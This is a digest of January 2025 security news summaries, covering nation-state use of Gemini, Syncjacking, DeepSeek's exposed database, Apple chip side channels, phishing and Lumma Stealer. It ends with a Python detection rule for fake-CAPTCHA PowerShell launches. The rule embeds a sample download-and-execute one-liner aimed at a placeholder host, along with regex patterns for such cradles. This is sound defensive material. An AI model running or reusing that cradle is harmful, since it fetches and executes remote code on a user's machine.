Google: Over 57 Nation-State Threat Groups Using AI for Cyber Operations

Google's Threat Intelligence Group reports that over 57 nation-state threat groups, including actors from China, Iran, North Korea, and Russia, are using its AI products, notably Gemini, in cyber operations. The groups primarily use it for productivity tasks such as research, troubleshooting code, and creating content, not for novel attack capabilities. Iran's APT42 is the heaviest user, relying on Gemini for phishing and reconnaissance; Chinese APTs use it to research post-compromise techniques such as lateral movement and privilege escalation; Russian actors focus on coding tasks such as rewriting publicly available malware in other languages and adding encryption; and North Korean actors use it to draft job applications for IT workers placed inside Western companies. Google stresses the urgent need for public-private cooperation to strengthen cyber defenses.

https://thehackernews.com/2025/01/google-over-57-nation-state-threat.html

New Syncjacking Attack Hijacks Devices Using Chrome Extensions

The new Syncjacking attack turns a seemingly benign Chrome extension into a full Google profile and browser takeover. The attacker registers a Google Workspace domain with its security controls disabled, tricks the victim into installing the extension, and the extension silently signs the browser into an attacker-managed Workspace profile; once the victim is persuaded to turn on Chrome sync, the attacker receives the synced passwords, history and other data. A fake Zoom update then enrolls the browser under the attacker's management, giving extensive control over the victim's browser and files while remaining stealthy and requiring minimal user interaction.

https://www.bleepingcomputer.com/news/security/new-syncjacking-attack-hijacks-devices-using-chrome-extensions/

DeepSeek Exposes Database With Over 1 Million Chat Records

DeepSeek, a Chinese AI startup, left two publicly reachable ClickHouse database instances exposed with no authentication, holding over 1 million plaintext chat records plus API keys, backend details and other operational data. Wiz Research found them during a security assessment and showed that the HTTP interface allowed anyone to run arbitrary SQL queries and take full control of the database. The exposure is a serious concern for DeepSeek and its users: an attacker could retrieve sensitive information and potentially pivot into the company's internal systems. Wiz reported the issue and DeepSeek secured the databases promptly.

https://www.bleepingcomputer.com/news/security/deepseek-exposes-database-with-over-1-million-chat-records/

Microsoft Advertisers Phished Via Malicious Google Ads

A malvertising campaign uses Google ads to target Microsoft advertisers and steal logins for the Microsoft Advertising platform. The attackers use cloaking to serve harmless content to Google's scanners while redirecting real visitors through a chain that ends at a phishing page mimicking the legitimate login site. The campaign highlights the ongoing phishing threat in online advertising; users should verify URLs before signing in, enable two-factor authentication, monitor their accounts, and report suspicious ads.

https://www.malwarebytes.com/blog/news/2025/01/microsoft-advertisers-phished-via-malicious-google-ads

Apple Chips Can Be Hacked to Leak Secrets From Gmail, iCloud, and More

Two side-channel attacks, FLOP and SLAP, abuse speculative-execution features in recent Apple A- and M-series chips to leak sensitive data out of browsers. FLOP exploits the load value predictor, which guesses the value a memory load will return, to read memory contents and works against both Chrome and Safari, exposing data from services such as Gmail and iCloud; SLAP targets the load address predictor and is limited to Safari. Devices built from 2021 onward are affected. The researchers proposed mitigations, and Apple says it plans to address the issues but does not consider them an immediate risk to users.

https://arstechnica.com/security/2025/01/newly-discovered-flaws-in-apple-chips-leak-secrets-in-safari-and-chrome/

Phishing Campaign Baits Hook With Malicious Amazon PDFs

A phishing campaign uses malicious PDF attachments claiming the recipient's Amazon Prime membership has expired to lure victims into handing over personal and payment data. Researchers at Palo Alto Networks Unit 42 found 31 such PDFs linking to fake Amazon sites hosted on cloaked domains that evade detection. Users are advised to be wary of unsolicited membership-expiry notices.

https://www.darkreading.com/cyberattacks-data-breaches/phishing-campaign-malicious-amazon-pdfs

DeepSeek Halts New Signups Amid “large-scale” Cyberattack

DeepSeek has suspended new registrations on its AI chat platform, citing a “large-scale” cyberattack believed to be a DDoS attack. The platform recently drew attention for matching US models at a fraction of the cost, which triggered a sell-off in US tech stocks. Existing users can still log in. Separately, security researchers report that DeepSeek's model can be jailbroken into producing malicious output.

https://www.bleepingcomputer.com/news/security/deepseek-halts-new-signups-amid-large-scale-cyberattack/

Microsoft Tests Edge Scareware Blocker to Block Tech Support Scams

Microsoft is testing a new “scareware blocker” in the Edge browser that uses a local machine-learning model to detect and block tech support scam pages, the kind that force full-screen mode and alarm the user with fake warnings. When it fires, Edge warns the user and lets them report the page to improve detection accuracy. The feature lives in Edge's privacy settings and complements Defender SmartScreen, which blocks sites already cataloged as malicious.

https://www.bleepingcomputer.com/news/microsoft/microsoft-tests-edge-scareware-blocker-to-block-tech-support-scams/

Apple Users: Update Your Devices Now to Patch Zero-day Vulnerability

Apple users should update their devices now to fix a zero-day vulnerability, tracked as CVE-2025-24085, that Apple says may have been actively exploited against versions of iOS before 17.2. It is a use-after-free bug in Core Media that lets a malicious app elevate privileges. Fixes ship for iPhone XS and newer, several iPad models, macOS Sequoia, Apple Watch Series 6 and later, and Apple TV. Check Settings for the update and consider enabling Automatic Updates.

https://www.malwarebytes.com/blog/news/2025/01/apple-users-update-your-devices-now-to-patch-zero-day-vulnerability

About the Security Content of iOS 18.3 and iPadOS 18.3

Apple's security notes for iOS 18.3 and iPadOS 18.3, released January 27, 2025, list the vulnerabilities fixed in that update for recent iPhones and iPads; the impacts include unauthorized data access, denial of service, and privilege escalation. Each fix carries its CVE ID. In line with its disclosure policy, Apple does not discuss or confirm security issues until an investigation is complete and patches are available. For the full list, consult the Apple security releases page.

https://support.apple.com/en-us/122066

Hacker Infects 18,000 “Script Kiddies” With Fake Malware Builder

A threat actor infected 18,000 aspiring cybercriminals (“script kiddies”) worldwide with a trojanized XWorm RAT builder that steals data and gives the operator control of the infected machine. The builder was spread through GitHub repositories, file-sharing sites, Telegram channels and YouTube. It included a kill switch, which security researchers used to send a mass uninstall command and disrupt the botnet, but machines that were offline at the time remain compromised. Would-be attackers are warned against trusting unsigned software distributed by other criminals.

https://www.bleepingcomputer.com/news/security/hacker-infects-18-000-script-kiddies-with-fake-malware-builder/

Seasoning Email Threats With Hidden Text Salting

Cisco Talos reports a rise in email threats that use hidden text salting to evade detection. The technique inserts text the recipient never sees (hidden with CSS such as zero font size, display:none or hidden overflow), HTML comments, or invisible characters into brand names and body copy, so parsers and spam filters misread the impersonated brand or misdetect the message's language. Countering it requires detection strategies that inspect for suspicious CSS properties and judge the message as the recipient would see it, alongside AI-driven email security solutions.

https://blog.talosintelligence.com/seasoning-email-threats-with-hidden-text-salting/

Lumma Stealer: Fake CAPTCHAs & New Techniques to Evade Detection

Lumma Stealer is being delivered through fake CAPTCHA pages in a global campaign that targets many sectors, particularly telecom. The page uses social engineering to get the victim to “verify” by running a clipboard-supplied command outside the browser, where browser protections no longer apply; the payload then uses process hollowing and obfuscated PowerShell to bypass endpoint defenses. The malware evolves continuously, making detection and prevention challenging; Netskope provides proactive threat detection against this campaign.

https://www.netskope.com/blog/lumma-stealer-fake-captchas-new-techniques-to-evade-detection
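
A detection for the "run it outside the browser" step, as an added example (this is not Netskope's detection logic). It assumes the fake-CAPTCHA flow in which the victim pastes the command into the Windows Run dialog, so the interpreter is spawned by explorer.exe with the full command line recorded; field names follow Sysmon Event ID 1, and the four events, the indicator list, the `example.invalid` URL and the scoring threshold are constructed for this example.

```python
"""Flag ClickFix-style command launches in process-creation telemetry.

Added example, not Netskope's detection logic. It assumes the fake-CAPTCHA
flow in which the victim pastes a clipboard-supplied command into the
Windows Run dialog, so the interpreter is spawned by explorer.exe with the
full command line recorded. Field names (Image, ParentImage, CommandLine)
follow Sysmon Event ID 1; the events below are constructed for this example.
"""
import base64
import re

INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}
# A parent of explorer.exe means the command was typed or pasted by the
# user (Run dialog, Start menu), not launched by a scheduled script.
USER_PARENTS = {"explorer.exe"}

# Command-line traits typical of a pasted one-liner that must run unseen,
# fetch a second stage and sidestep execution policy.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(
        r"-e(?:nc|ncodedcommand|c)?\s+([A-Za-z0-9+/=]{16,})", re.I),
    "download_cradle": re.compile(
        r"\b(?:iex|invoke-expression|irm|invoke-restmethod|iwr|invoke-webrequest"
        r"|downloadstring|mshta\s+https?:)", re.I),
    "bypass_policy": re.compile(r"-e(?:p|xecutionpolicy)\s+bypass", re.I),
}


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand argument (UTF-16LE base64)."""
    m = INDICATORS["encoded_command"].search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze_event(event):
    """Score one process-creation event; flag user-launched suspicious interpreters."""
    image, parent = basename(event["Image"]), basename(event["ParentImage"])
    cmd = event["CommandLine"]
    hits, decoded = [], None
    if image in INTERPRETERS:
        decoded = decode_encoded_command(cmd)
        for name, rx in INDICATORS.items():
            # match on the visible command line or on the decoded payload
            if rx.search(cmd) or (decoded and rx.search(decoded)):
                hits.append(name)
    # Two or more traits on a user-launched interpreter is the alert condition.
    return {
        "flagged": parent in USER_PARENTS and len(hits) >= 2,
        "indicators": hits,
        "decoded": decoded,
    }


def flagged_events(events):
    """Indices of events this rule would alert on."""
    return [i for i, e in enumerate(events) if analyze_event(e)["flagged"]]


# Constructed second-stage fetch, encoded the way -enc expects (UTF-16LE, base64).
PAYLOAD = "iex (irm https://example.invalid/c.txt)"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

SAMPLE_EVENTS = [
    {   # user opened an interactive shell: nothing suspicious
        "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
        "CommandLine": "powershell.exe",
    },
    {   # admin running a maintenance script with -File: one trait only
        "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
        "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Tools\backup.ps1",
    },
    {   # pasted fake-CAPTCHA one-liner: hidden, policy bypass, encoded cradle
        "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
        "CommandLine": f"powershell.exe -w hidden -ep bypass -enc {ENCODED}",
    },
    {   # same one-liner spawned by a script host: for a different rule
        "ParentImage": r"C:\Windows\System32\wscript.exe", "Image": PS,
        "CommandLine": f"powershell.exe -w hidden -ep bypass -enc {ENCODED}",
    },
]

if __name__ == "__main__":
    for i, ev in enumerate(SAMPLE_EVENTS):
        r = analyze_event(ev)
        print(i, "ALERT" if r["flagged"] else "ok   ", r["indicators"], r["decoded"])
```

Decoding the `-enc` blob before matching matters: the download cradle in the third event is invisible on the raw command line and only shows up in the decoded payload. The parent-process check keeps ordinary admin use (second event) below the threshold while still catching the pasted one-liner.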
